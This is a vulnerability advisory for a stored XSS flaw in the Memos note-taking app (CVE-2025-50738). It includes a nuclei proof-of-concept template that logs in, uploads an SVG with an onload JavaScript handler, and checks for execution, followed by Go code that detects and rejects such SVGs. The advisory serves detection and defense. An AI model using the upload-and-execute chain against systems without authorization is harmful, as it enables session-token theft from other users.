Memos Stored XSS via SVG File Upload Vulnerability

Vulnerability Information

Vulnerability name: Memos Stored XSS via SVG File Upload Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-50738

Vulnerability type: Cross-site scripting

Severity: Medium

Description: Memos is a lightweight note-taking application that lets users record and share notes. It is typically used by individual users and small teams for day-to-day information management and collaboration. The stored cross-site scripting (XSS) vulnerability described here affects Memos versions before 0.25.0. The technical root cause is that the application does not adequately validate and sanitize the content of uploaded SVG files, so malicious JavaScript can be injected and stored on the server. When other users visit a page that includes the malicious SVG file, the injected code executes in their browsers. The vulnerability can be exploited by an authenticated attacker who uploads a specially crafted SVG file. Because exploitation requires authentication, the potential impact is limited to some extent, but on success the attacker can steal users' session tokens, redirect users to malicious sites, or perform other malicious actions in the user's context. Therefore, although the vulnerability is rated medium severity, it still poses a significant security risk to users of affected Memos versions.

Vendor: usememos

Product: Memos

Affected versions: < 0.25.0

Source: https://github.com/projectdiscovery/nuclei-templates/blob/98272924cf26e7491833caa46303926dddc70fe7/headless%2Fcves%2F2025%2FCVE-2025-50738.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC Details


id: CVE-2025-50738

info:
  name: Memos < 0.25.0 - Stored XSS via SVG File Upload (Fixed Matcher)
  author: (SeongHyeon Jeon)nukunga
  severity: medium
  description: |
    An authenticated attacker can upload a specially crafted SVG file containing JavaScript code to Memos versions prior to 0.25.0, leading to a stored cross-site scripting (XSS) vulnerability.
  reference:
    - https://github.com/usememos/memos/issues/4707
    - https://github.com/advisories/GHSA-hfcf-79gh-f3jc
    - https://nvd.nist.gov/vuln/detail/CVE-2025-50738
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
    # note: 9.8 does not follow from the vector above; that vector scores 6.5
    # under CVSS 3.1, which is consistent with "severity: medium"
    cvss-score: 9.8
    # note: CWE-200 is the published value; stored XSS is normally classified as CWE-79
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
  tags: xss,stored-xss,memos,authenticated,ghsa,intrusive,headless

variables:
  username: "{{username}}"
  password: "{{password}}"
  filename: "{{rand_base(8)}}"

http:
  # step 1: sign in and capture the session cookie from the response headers
  - raw:
      - |
        POST /api/v1/auth/signin?username={{username}}&password={{password}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}
    extractors:
      - type: regex
        part: header
        name: access_token
        internal: true
        group: 1
        regex:
          - 'memos\.access-token=([^;]+);'

  # step 2: upload the SVG (base64 in "content") using the filename variable
  # declared above; the same name is used again in the headless navigate step
  - method: POST
    path:
      - "{{BaseURL}}/api/v1/resources"
    headers:
      Cookie: "memos.access-token={{access_token}}"
      Content-Type: "application/json"
    body: |
      {
        "filename": "{{filename}}.svg",
        "content": "PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIG9ubG9hZD0iYWxlcnQoMSkiPjwvc3ZnPg==",
        "type": "image/svg+xml"
      }

    extractors:
      - type: regex
        name: resource_id
        internal: true
        part: body
        group: 1
        regex:
          - '"name":"resources/([A-Za-z0-9]+)"'

# step 3: open the stored file in a headless browser and wait for the alert dialog
headless:
  - steps:
      - action: navigate
        args:
          url: "{{BaseURL}}/file/resources/{{resource_id}}/{{filename}}.svg"

      - action: waitdialog
        name: xss_alert

    matchers:
      - type: dsl
        dsl:
          - xss_alert == true
          - xss_alert_message == "1"
          - xss_alert_type == "alert"
        condition: and
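The template's "content" field is a base64-encoded SVG, and the root cause described above is that the server stored it without inspecting it. The following Go program is an added example, not code from Memos or from the nuclei template: it decodes that payload so a reviewer can see the construct involved, and it shows the upload-side check a defender would want, tokenising an SVG with encoding/xml (nothing is rendered or executed) and reporting event-handler attributes, script-capable elements, and javascript:/data: URIs. The function and type names (DecodePOCPayload, InspectSVG, AcceptSVGUpload, Finding) and the benign sample SVG are constructed for this example.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// pocContent is the base64 "content" value from the nuclei template above.
const pocContent = "PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIG9ubG9hZD0iYWxlcnQoMSkiPjwvc3ZnPg=="

// benignSVG is a constructed, harmless SVG used to show a clean pass.
const benignSVG = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4" fill="#09f"/></svg>`

// DecodePOCPayload returns the SVG bytes the template uploads, so a reviewer
// can see the exact construct an upload filter has to catch.
func DecodePOCPayload() ([]byte, error) {
	return base64.StdEncoding.DecodeString(pocContent)
}

// Finding is one active-content construct located in an SVG document.
type Finding struct {
	Element string // element in which the construct appears
	Attr    string // offending attribute, or "" for an element-level finding
	Reason  string
}

// activeElements can execute script or embed foreign content inside an SVG.
var activeElements = map[string]bool{
	"script": true, "foreignobject": true, "iframe": true, "embed": true, "object": true,
}

// InspectSVG walks the XML token stream (no rendering, no script execution)
// and reports event-handler attributes, active elements, and javascript:/data:
// URIs in link attributes. An empty slice means nothing suspicious was found.
func InspectSVG(data []byte) ([]Finding, error) {
	dec := xml.NewDecoder(bytes.NewReader(data))
	dec.Strict = false // many real SVGs are not strictly well-formed; inspect them anyway
	findings := []Finding{}
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return findings, nil
		}
		if err != nil {
			return findings, err
		}
		se, ok := tok.(xml.StartElement)
		if !ok {
			continue
		}
		el := strings.ToLower(se.Name.Local)
		if activeElements[el] {
			findings = append(findings, Finding{Element: el, Reason: "active-content element"})
		}
		for _, a := range se.Attr {
			name := strings.ToLower(a.Name.Local) // xlink:href arrives here with Local == "href"
			val := strings.ToLower(strings.TrimSpace(a.Value))
			switch {
			case strings.HasPrefix(name, "on"):
				findings = append(findings, Finding{Element: el, Attr: name, Reason: "event handler attribute"})
			case (name == "href" || name == "src") && (strings.HasPrefix(val, "javascript:") || strings.HasPrefix(val, "data:")):
				findings = append(findings, Finding{Element: el, Attr: name, Reason: "script or data URI"})
			}
		}
	}
}

// AcceptSVGUpload is the policy decision an upload handler would make:
// reject an SVG with any finding rather than trying to clean it in place.
func AcceptSVGUpload(data []byte) (bool, string) {
	f, err := InspectSVG(data)
	if err != nil {
		return false, "unparseable SVG: " + err.Error()
	}
	if len(f) > 0 {
		return false, fmt.Sprintf("%d active-content construct(s), first: <%s> %s (%s)", len(f), f[0].Element, f[0].Attr, f[0].Reason)
	}
	return true, "ok"
}

func main() {
	poc, err := DecodePOCPayload()
	if err != nil {
		panic(err)
	}
	fmt.Printf("POC uploads: %s\n", poc)
	for _, sample := range [][]byte{poc, []byte(benignSVG)} {
		ok, why := AcceptSVGUpload(sample)
		fmt.Printf("accept=%v reason=%s\n", ok, why)
	}
}
```

Rejecting rather than sanitising keeps the check simple and auditable; a second, independent layer is to serve user uploads with Content-Disposition: attachment and a restrictive Content-Security-Policy so that an SVG that does slip through is downloaded rather than rendered in the application's origin. The decoder is run in non-strict mode deliberately: a filter that errors out on sloppy markup gives an attacker an easy way to bypass inspection while the browser still renders the file.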


http://example.com/2025/08/03/github_2771826056/
Author
lianccc
Published
3 August 2025
License